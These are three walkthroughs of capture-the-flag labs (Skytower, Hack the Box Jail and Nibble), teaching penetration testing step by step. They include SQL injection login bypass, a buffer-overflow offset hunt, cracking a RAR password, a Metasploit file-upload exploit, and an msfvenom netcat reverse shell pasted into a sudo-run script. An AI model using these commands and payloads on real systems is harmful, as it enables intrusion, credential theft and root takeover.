Hack the Skytower (CTF Challenge)

Hello everyone. Today we’ll be walking through skytower CTF challenge. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

Level: Easy

Aim: find flag.txt in victim’s PC and obtain the root password.

Let’s go then!

Download the skytower lab from here.

Once downloaded, let us run netdiscover command on our terminal to find out the IP address. By this method we found out that the IP address of the vulnerable lab is 192.168.1.123 since I am running it on local network.

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.123

By this scan we found that port 80 is open so it must have a webpage associated with it.

There is also an SSH port and a proxy port too but let’s focus on webpage first. A login form opened up when I typed in the IP in address bar of my browser that requires email ID and password to login.

Let’s try by typing :

Email: ‘*’

Password: ‘*’

Voila! Our blind SQLinjection worked here and the SSH account details were given to us on the login.php page.

Now, we could have tried connecting to it via normal SSH but the problem is that the SSH is filtered.

And since, we are seeing a proxy on port 3128, let’s try and route our SSH connection through the proxy server.

Type gedit /etc/proxychains.conf and add this statement in the end:

http 192.168.1.123 3128

save and exit the config file. On a new terminal window, let’s try SSH connection via that proxy.

proxychains ssh john@192.168.1.123

As we can see, it immediately closed the connection upon us when we typed in the username as john and password as hereisjohn.

So, that gives us an idea that we won’t get a shell. Let’s try suffixing /bin/bash with the ssh command only

proxychains ssh john@192.168.1.123 /bin/bash

Voila! It did the trick. Type id to check the priviledges.

Now, let’s check the current directory and the elements in it by:

pwd

ls –la

We can see a bashrc file. Probably this is the file that is causing trouble in giving a shell. Let’s remove this file by:

rm .bashrc

With .bashrc gone, let’s try SSHing once more.

Perfect! It did give us a proper shell. Let’s type in sudo –l  to check sudoers list but as you can see, john is not in the sudoers list. And we don’t know any other user too!

Let’s type netstat –antp  and hope there is some service that would allow us to look for any other user.

Port 3306 is listening which means mysql database would have the info of some other users for sure!

But the problem is that we don’t have the database name and the login details.

Remember that we have an SQL error on page 192.168.1.123/login.php maybe if we read its source code, we could find the database name and the login credentials.

Let’s read it by:

cat /var/www/login.php

We can see that the database name is “SkyTech,” the username and password both are “root.”

Log in to mysql via:

mysql –u root –p root

Here, we run:

show tables;

We have a table called login.

select * from login;

Following database appeared:

Id                                                                            email                                                     password

1	john@skytech.com	hereisjohn
2	sara@skytech.com	ihatethisjob
3	william@skytech.com	senseable

So, let’s try logging in via ssh as the user sara.

ssh sara@localhost –t /bin/bash

Type in the password as: ihatethisjob

sudo –l

Now, we have a clear list of sudoers.

We finally have a directory with no password required. So, let’s try and check the contents in the directory /accounts.

We type sudo ls /accounts/../../../root

And a file called “flag.txt” appears!

sudo cat /accounts/../../../root/flag.txt to read the flag.txt file and we get the root password!

Congrats! We solved the Skytower CTF challenge!

Hack the Box Challenge: Jail Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Jail” which is available online for those who want to increase their skill in penetration testing and black box testing. Jail is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.34 so let’s begin with nmap port enumeration.

nmap -sV –p- 10.10.10.34 --open

From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find an ascii art of prison cell on the webpage.

We run dirbuster on port 80, which reveals a directory entitled jailuser/, with a folder called dev/ inside the directory.

Inside the folder we see three files; a binary file, a c-program, and a bash script.

We open the c-program and find that it is a program for some kind of authentication. We also find that it uses strcpy function for the variable password.

We download the rest of the files, in the bash script there are just a few commands for a service called jail and by checking the jail binary we find that it is an ELF file.

Now we give the binary executable permissions and run the binary.

We check netstat and find that it opens up a port 7411. We check the nmap scan and find that port 7411 is open in the target machine.

Now we open the binary in gdb to look at the assembly code. The binary works by forking itself to each server call, so in the event of a crash the primary process will still run.  We use the command below in gdb to make the process debug in forked process.

gdb -q jail

(gdb)  set follow-fork-mode child

(gdb) set detach-on-fork off

(gdb) run

First we create a 50 bytes long string to find the EIP offset using patter_create script.

./pattern_create –l 50

Now we connect to the binary running on our system using netcat. We check the c program we found earlier to find the functions we need to use.

We know from the c-program that there is a strcpy function that copies the content of a variable called password to a variable called username. Now we use the pattern we created earlier and send it as password variable. We use the DEBUG function of the binary to get the address of the stack pointer.

nc localhost 7411

USER admin

DEBUG

PASS {pattern}

As soon as we pass the string we get a segmentation fault and find that the EIP register was overwritten with 0x62413961.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of28. So we need to write 28 characters and then write the address of the instructions we want to be executed.

./pattern_offset.rb  -q 62413961 -l 50

The off-set is 28 now we can proceed to create our python exploit using the available data to gain a shell. You can download the exploit used in the machine from here. After running the exploit we get a shell as user “nobody”.

Now for privilege escalation, we know that the machine is running NFS share we try to exploit it. We first find the shared folders of the target machine.

showmount -e 10.10.10.34

After finding the shared folders we mount them locally. After mounting the shared folder we find that only root user has read, write and execute permissions but a user with GID 1000 can write and execute files inside the folder.

So we create a user with GID 1000, so that we can upload our shell to exploit this weak permission vulnerability.

We login as user frank and create a c-program inside the shared folder that can set the real and effective user id to be 1000 of the calling the process.

Then we compile the program set the suid bit, so that we can spawn a shell with EUID 1000.

Now we go back to our reverse shell and run the binary that we just created. As soon as we run binary we spawn a shell as user “frank”.

We spawn a TTY shell and take a look at the sudoers list. We find that we can open jail.c file in /var/www/html/jailuser with rvim as user adm with no password.

python -c “import pty;pty.spawn(‘/bin/bash’)”

sudo -l

Before running the command we find in the sudoers list, first we go to /home/frank directory and find a file called “user.txt”. We take a look at the content of the file and find our first flag.

Now we run the 2^nd command we find in the sudoers list. Now we use rvim to spawn a shell, as rvim is running as user adm when we spawn a shell we will get a shell as user adm.

Inside adm’s home directory we find a hidden folder called “.keys”. We go inside the directory and find one rar file called “keys.rar”, and one text file called “note.txt”.

We take a look at the content of note.txt file and find a hint for a password that states that the password would be user Frank’s last name followed by 4 digits and a symbol.

Now when we try to look for hidden directories, we find another folder called “.local”, we go inside that directory and find a hidden file called “.frank”.

We open the file and find it that the content of the file is encrypted.

We use the site https://quipqiup.com and find the decrypted text; it was related to someone escaping Alcatraz.

Now we want to send keys.rar file from the target machine to our system. We first convert the content of keys.rar to base64 enoding, so that there are no bad characters.

Now we recreate the file by decoding the string in our local system.

When we try to extract the rar file we are asked for a password.

unrar x keys.rar

Now from the earlier hint we try to google search “frank Alcatraz” and find that there was a guy called Frank Miller who escaped Alcatraz prison in 1962.

We know that there was a message from the administrator to frank that his password is his last name followed by 4 digits and 1 symbol. We use crunch to create a dictionary with this information, we assume the number to be 1962 as it was the year Frank Miller escaped and it fits the 4 digit number in his password.

crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@

After creating a wordlist, we use rar2john utility to convert keys.rar into a format suitable for use with john the ripper.

rar2john keys.rar > jail

We find the password to “Morris1962!” after we ran john the ripper to find the password for the rar file using the word list we created using crunch.

Now we extract the file using the password we find earlier and find a public key.

We use rsactftool to convert the public key into private key so that we can use this to login through ssh. After getting the private key; we change the permission of the private key to read write for owner only. You can download the RsaCtfTool here.

python RsaCtfTool.py --publickey /root/rootauthorizedsshkey.pub –private > /root/id_rsa

We use the ssh private key to login into the target machine; once we connected through ssh we were login as root user we check the content for home directory of root and find a file called “root.txt”. We check inside the file and find our second and final flag.

ssh -i id_rsa 10.10.10.34

Hack the Box Challenge: Nibble Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Nibble” which is categories as retired lab presented by Hack the Box for making online penetration practices. 

Level: Easy

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Nibble is 10.10.10.75 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10.75

As you can see in the given screenshot that we have two services running on our Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by following page.

Then we use curl to send http request on http://10.10.10.75 and notice /nibbleblog/ which could be any web directory.

So we execute the http://10.10.10.75/nibbleblog/ directory put us on the main page of a blogging platform NibbleBlog Yum yum. Without wasting time search for the exploit in the Google and Rapid 7 link for its exploitation.

So we load metasploit framework and executed following command to take meterpreter session of victim’s VM.

According to this module Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

use exploit/multi/http/nibbleblog_file_upload

msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75

msf exploit(multi/http/nibbleblog_file_upload) > set username admin

msf exploit(multi/http/nibbleblog_file_upload) > set password nibble

msf exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog

msf exploit(multi/http/nibbleblog_file_upload) > exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it. I found the 1^st flag “user.txt” from inside /home/nibbler.

cd /home

cd /nibbler

cat user.txt

For spawning proper tty shell of target’s system we need to import python file, therefore, I run following command inside meterpreter shell.

shell

python -c 'import pty;pty.spawn("/bin/bash")'

ls

Inside /nibbler there was a zip file so we try to unzip it with help of following command and after extracting zip file we got a directory “personal”, so we get inside it, then with a little more efforts found a script monitor.sh.

unzip personal.zip

cd personal

ls

cd stuff

ls -al 

Then I check sudo rights for user “nibbler” and notice nibbler has sudo permission for script monitor.sh which means he can modify this script

So in a new terminal we generated a payload for netcat shell with help of msfvenom command as shown and copied the highlighted code and start necat listener too.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.25 lport=5555 R

nc -lvp 5555

Then to it exploit it we move inside following Path: /home/nibbler/personal/stuff/ and paste above copied code inside monitor.sh as shown below

cd /home/nibbler/personal/stuff/

echo “mkfifo /tmp/jswwrii; nc 10.10.14.25 5555 0

/tmp/jswwrii 2>&1; rm /tmp/jswwrii” > monitor.sh

Since we knew monitor.sh has full permission, so we can run it to obtain reverse shell along root access.

On other we have netcat listener, which has provided root access to us. Let’s finish this task and grab the root.txt file………………………………..

id

cd /root

ls

root.txt

cat root.txt